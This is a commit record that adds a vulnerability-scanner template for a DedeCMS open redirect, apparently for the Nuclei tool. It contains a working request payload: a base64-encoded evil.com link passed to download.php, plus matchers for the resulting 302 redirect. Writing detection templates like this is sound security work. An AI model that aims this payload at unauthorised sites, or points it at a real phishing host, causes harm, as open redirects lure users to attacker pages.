Merge pull request #907 from pikpikcu/patch-76

Create dedecms-openredirect
patch-1
PD-Team 2021-02-20 23:12:33 +05:30 committed by GitHub
commit 829ab3d5dd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: dedecms-openredirect
info:
name: DedeCMS Open Redirect
author: pikpikcu
severity: low
reference: https://blog.csdn.net/ystyaoshengting/article/details/82734888
tags: dedecms,redirect
requests:
- method: GET
path:
- "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo="
matchers-condition: and
matchers:
- type: word
words:
- "Location: https://evil.com"
part: header
- type: status
status:
- 302